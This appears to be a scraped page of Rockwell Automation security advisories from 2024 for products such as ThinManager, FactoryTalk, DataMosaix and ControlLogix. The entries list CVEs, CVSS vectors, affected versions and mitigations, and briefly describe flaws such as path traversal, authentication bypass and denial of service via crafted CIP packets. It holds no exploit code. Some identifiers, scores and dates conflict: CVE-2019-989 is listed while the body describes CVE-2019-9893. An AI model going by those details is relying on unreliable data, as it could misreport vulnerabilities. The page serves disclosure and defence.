CVSS Base Score: 8.7/10 (high)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-400: Uncontrolled Resource Consumption

ADDITIONAL RESOURCES

  • JSON CVE-2024-8626

Medium
SD1704 | Improper Authorization Vulnerability in Verve® Asset Manager
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2024-9412
CVSS Scores (v3.1):
6.8
CVSS Scores (v4.0):
8.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/24

Last updated: 10/8/24

Revision Number: 1.0

CVSS Score: v3.1: 6.8, v4.0: 8.4

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
Verve® Asset Manager | All versions < 1.38 | V1.38

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-9412 IMPACT

An improper authorization vulnerability exists in the affected products that could allow an unauthorized user to sign in. While removal of all role mappings is unlikely, it could occur in the case of unexpected or accidental removal by the administrator. If exploited, an unauthorized user could access data they previously had access to but should no longer be able to reach.

CVSS Base Score v3.1: 6.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H


CVSS Base Score v4.0: 8.4/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-842: Placement of User into Incorrect Group 

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.


Mitigations and Workarounds 

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.  

  • The presence of any mappings will help prevent this vulnerability from being exploited. If all mappings must be removed, manually removing previously mapped users is an effective workaround.

  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-9412

Critical
SD1703 | DataMosaix™ Private Cloud third-party Vulnerabilities
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2019-14855, CVE-2019-17543, CVE-2019-18276, CVE-2019-19244, CVE-2019-989, CVE-2019-9923
CVSS Scores (v3.1):
7.5, 8.1, 7.8, 7.5, 9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7, 9.3, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/24

Revision Number: 1.0

CVSS Score: v3.1: 7.5, 8.1, 7.8, 9.8; v4.0: 8.7, 9.3

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud | <=7.07 | v7.09

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2019-14855 IMPACT

The affected product utilizes GnuPG which contains a certificate signature vulnerability found in the SHA-1 algorithm. A threat actor could use this weakness to create forged certificate signatures. If exploited, a malicious user could view customer data.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-17543 IMPACT

The affected product utilizes LZ4 which contains a heap-based buffer overflow vulnerability in versions before 1.9.2 (related to LZ4_compress_destSize), that affects applications that call LZ4_compress_fast with a large input. This issue can also lead to data corruption. NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk." If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-18276 IMPACT

The affected product utilizes GNU Bash, which contains a vulnerability in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. A threat actor with command execution in the shell can use "enable -f" for runtime loading to gain privileges. If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-19244 IMPACT

The affected product utilizes SQLite 3.30.1, which contains a vulnerability in sqlite3Select in select.c that allows a crash if a subselect uses both DISTINCT and window functions and has certain ORDER BY usage. If exploited, a malicious actor could perform a denial-of-service, which would require the user to restart the software to recover it.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-9893 IMPACT

The affected product utilizes libseccomp, which contains a vulnerability in versions 2.4.0 and earlier that does not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE). This vulnerability could lead to bypassing seccomp filters and potential privilege escalations. If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2019-9923 IMPACT

The affected product utilizes GNU Tar, which contains a vulnerability in pax_decode_header in sparse.c in versions before 1.32. pax_decode_header has a NULL pointer dereference when parsing certain archives that have malformed extended headers. If exploited, a malicious actor could perform a denial-of-service, which would require the user to restart the software to recover it.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES


  • CVE-2019-14855 JSON
  • CVE-2019-17543 JSON
  • CVE-2019-18276 JSON
  • CVE-2019-19244 JSON
  • CVE-2019-989 JSON
  • CVE-2019-9923 JSON


High
SD1702 | Sensitive Data Exposure and Escalating Privileges Vulnerabilities in DataMosaix™ Private Cloud
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2024-7952, CVE-2024-7953, CVE-2024-7956
CVSS Scores (v3.1):
7.5, 8.8, 8.1
CVSS Scores (v4.0):
7.5, 8.7, 7.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/24 

Revision Number: 1.0 
CVSS Score: v3.1: 7.5, 8.8; v4.0: 8.7

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud | <=7.07 | v7.09

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7952 IMPACT

A data exposure vulnerability exists in the affected product. There are hardcoded links in the source code that lead to JSON files that can be reached without authentication. If exploited, a threat actor could view customer data. 

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE: Exposure of Sensitive Information to an Unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7953 IMPACT

A vulnerability exists in the affected products that allows a threat actor to create a project and become the administrator for it. If exploited, a threat actor could create, modify, and delete their own project. 

CVSS 3.1 Base Score: 8.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Missing Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7956 IMPACT 

A vulnerability exists in the affected products that allows a threat actor to gain access to other users’ projects. To exploit this vulnerability, the threat actor must have basic user privileges. If exploited, the threat actor can modify and delete the project.

CVSS 3.1 Base Score: 8.1 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 7.6 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

  • Security Best Practices 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2024-7952 JSON
  • CVE-2024-7953 JSON
  • CVE-2024-7956 JSON
High
SD1701 | RSLogix™ 5 and RSLogix 500® Remote Code Execution Via VBA Embedded Script
Published Date:
September 16, 2024
Last Updated:
October 14, 2024
CVE IDs:
CVE-2024-7847
CVSS Scores (v3.1):
7.7
CVSS Scores (v4.0):
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Published Date: September 19, 2024

Last updated:  September 19, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.7/10, v4.0: 8.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Version | Corrected in Software Version
RSLogix 500® | All | n/a
RSLogix™ Micro Developer and Starter | All | n/a
RSLogix™ 5 | All | n/a

Mitigations and Workarounds 

Users of the affected software are encouraged to apply the following mitigations and security best practices, where possible.

  • Deny the execution feature in FactoryTalk® Administration Console, when not needed, by navigating to “Policies”, selecting “Enable/Disable VBA”, and then checking the “Deny” box to block VBA code execution.

  • Save project files in a trusted location where only administrators can modify them, and verify file integrity.

  • Utilize the VBA editor protection feature, which locks the VBA code from viewing and editing by setting a password.

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported to us by Sharon Brizinov of Claroty Research - Team82. 

A feature in the affected products enables users to prepare a project file with an embedded VBA script that can be configured to run once the project file has been opened, without user intervention. This feature can be abused to trick a legitimate user into executing malicious code upon opening an infected RSP/RSS project file. If exploited, a threat actor may be able to perform a remote code execution. Connected devices may also be impacted by exploitation of this vulnerability.

CVE-2024-7847 IMPACT

CVSS Base Score 3.1: 7.7/10

CVSS Vector String 3.1: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVSS Base Score 4.0: 8.8/10

CVSS Vector String 4.0: CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE: CWE-345 (Insufficient verification of data authenticity)

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.


ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

  • JSON CVE-2024-7847
High
SD1699 | 5015-U8IHFT Denial-of-Service Vulnerability via CIP Message
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45825
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
5015-U8IHFT | V1.011 and V1.012 | V2.011

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45825 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Block communication to CIP class 883 if it is not required.

  • Block communication to CIP class 67 if it is not required.

  • Enforce proper network segmentation and routing controls.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-45825

Critical
SD1698 | FactoryTalk® Batch View™ Authentication Bypass Vulnerability via shared secrets
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45823
CVSS Scores (v3.1):
8.1
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 8.1/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
FactoryTalk® Batch View™ | 2.01.00 | 3.00.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45823 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-287: Improper Authentication
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-45823

High
SD1700 | ThinManager® Code Execution Vulnerability
Published Date: September 12, 2024
Last Updated: November 11, 2024
CVE IDs: CVE-2024-45826
CVSS Scores (v3.1): 6.8
CVSS Scores (v4.0): 8.5
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 6.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product   Affected Software Versions   Corrected in Software Version
ThinManager®       V13.1.0 - 13.1.2             V13.1.3
ThinManager®       V13.2.0 - 13.2.1             V13.2.2

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45826 IMPACT

Due to improper input validation, a path traversal and remote code execution vulnerability exists when ThinManager® processes a crafted POST request. If exploited, a user can install an executable file.

CVSS 3.1 Base Score: 6.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-610: Externally Controlled Reference to a Resource in Another Sphere
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-45826

High
SD1697 | AADvance® Trusted® SIS Workstation contains multiple 7-ZIP Vulnerabilities
Published Date: September 12, 2024
Last Updated: November 11, 2024
CVE IDs: CVE-2023-31102, CVE-2023-40481
CVSS Scores (v3.1): 7.8
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.8/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product                     Affected Software Versions   Corrected in Software Version
AADvance® Trusted® SIS Workstation   2.00.01 and earlier          2.00.02

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-31102 IMPACT

A vulnerability exists which could allow remote threat actors to execute arbitrary code on affected installations of 7-Zip. User interaction is required to exploit this vulnerability because the target must visit a malicious page or open a malicious file.

The specific vulnerability exists in the analysis of 7Z files. The problem results from the lack of proper validation of user-supplied data, which can lead to an integer underflow before writing to memory. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE:  CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

CVE-2023-40481 IMPACT

A SquashFS file parsing out-of-bounds write remote code execution vulnerability exists in 7-Zip that allows remote threat actors to execute arbitrary code on affected installations of 7-Zip. User interaction is also required to exploit this vulnerability, as the target must visit a malicious page or open a malicious file.

The specific vulnerability arises during the analysis of SQFS files due to the lack of proper validation of user-supplied data. This can cause a write operation to exceed the end of an allocated buffer. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE:  CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Do not archive or restore projects from unknown sources.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2023-31102

  • JSON CVE-2023-40481

Critical
SD1696 | FactoryTalk® View Site Edition Remote Code Execution Vulnerability via Lack of Input Validation
Published Date: September 12, 2024
Last Updated: November 13, 2024
CVE IDs: CVE-2024-45824
CVSS Scores (v3.1): 9.8
CVSS Scores (v4.0): 9.2
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product                 Affected Software Versions   Corrected in Software Version
FactoryTalk® View Site Edition   V12.0, V13.0, V14.0          Patches available here

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45824 IMPACT

A remote code execution vulnerability exists in the affected products. The vulnerability occurs when chained with Path Traversal, Command Injection, and XSS vulnerabilities and allows for full unauthenticated remote code execution. The link in the mitigations section below contains patches to fix this issue.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-77: Improper Neutralization of Special Elements used in a Command
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Navigate to the following link and apply the patches; directions are on the linked page.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-45824

High
SD1695 | Incorrect Privileges and Path Traversal Vulnerability in Pavilion8®
Published Date: September 11, 2024
Last Updated: October 16, 2024
CVE IDs: CVE-2024-7960, CVE-2024-7961
CVSS Scores (v3.1): 7.6, 7.2
CVSS Scores (v4.0): 8.8, 8.6
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 9/12/24
Revision Number: 1.0
CVSS Score: v3.1: 7.6, 7.2; v4.0: 8.8, 7.6

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION 

Affected Product   Affected Software Version   Corrected in Software Version
Pavilion8®         <V5.20                      V6.0 and later

VULNERABILITY DETAILS 

Rockwell Automation used the latest versions of the CVSS scoring system to assess the vulnerabilities. 

CVE-2024-7960 IMPACT 

The affected product contains a vulnerability that allows a threat actor to view sensitive information and change settings. The vulnerability exists due to having an incorrect privilege matrix that allows users to have access to functions they should not.  

CVSS 3.1 Base Score: 7.6 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L 

CVSS 4.0 Base Score: 8.8 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N 

CWE:  Improper Privilege Management 
Known Exploited Vulnerability (KEV) database: No 

CVE-2024-7961 IMPACT 

A path traversal vulnerability exists in the affected product.  If exploited, the threat actor could upload arbitrary files to the server that could result in a remote code execution.   

CVSS 3.1 Base Score: 7.2 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 

CVSS 4.0 Base Score: 8.6 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 

CWE:  Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') 
Known Exploited Vulnerability (KEV) database: No 

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

  • Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 

ADDITIONAL RESOURCES 

  • CVE-2024-7960 JSON

  • CVE-2024-7961 JSON

High
SD1694 | OptixPanel™ Privilege Escalation Vulnerability via File Permissions
Published Date: September 10, 2024
Last Updated: November 13, 2024
CVE IDs: CVE-2024-8533
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 7.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product               First Known in Software Version   Corrected in Software Version
2800C OptixPanel™ Compact      4.0.0.325                         4.0.2.116
2800S OptixPanel™ Standard     4.0.0.350                         4.0.2.123
Embedded Edge Compute Module   4.0.0.347                         4.0.2.106

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-8533 IMPACT

A privilege escalation vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing users to exfiltrate credentials and escalate privileges.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-269: Improper Privilege Management
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply security best practices.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-8533


High
SD1693 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Vulnerable to DoS vulnerability via CIP
Published Date: September 10, 2024
Last Updated: November 13, 2024
CVE IDs: CVE-2024-6077
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Published Date: 9/12/2024
Updated Date: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.4, v4.0: 8.3

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.


AFFECTED PRODUCTS AND SOLUTION

Affected Family                 First Known in Software/Firmware Version   Corrected in Software/Firmware Version
CompactLogix 5380               v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
CompactLogix 5380 Process       v33.011                                    v33.017, v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL 2   v32.013                                    v33.017, v34.014, v35.013, v36.011 and later
Compact GuardLogix 5380 SIL 3   v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
CompactLogix 5480               v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
ControlLogix® 5580              v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
ControlLogix® 5580 Process      v33.011                                    v33.017, v34.014, v35.013, v36.011 and later
GuardLogix 5580                 v32.011                                    v33.017, v34.014, v35.013, v36.011 and later
1756-EN4                        v2.001                                     v6.001 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6077 IMPACT

A denial-of-service vulnerability exists in the affected products when specially crafted packets are sent to the CIP Security Object. If exploited, the device will become unavailable and require a factory reset to recover.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers who are unable to upgrade to the corrected software versions are encouraged to apply the following risk mitigations. 

  • Users who do not wish to use CIP security can disable the feature per device. See "Disable CIP Security" in Chapter 2 of "CIP Security with Rockwell Automation Products" (publication SECURE-AT001)

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

  • JSON CVE-2024-6077

Critical
SD1692 | ThinManager® ThinServer™ Information Disclosure and Remote Code Execution Vulnerabilities
Published Date: August 21, 2024
Last Updated: November 19, 2024
CVE IDs: CVE-2024-7986, CVE-2024-7987, CVE-2024-7988
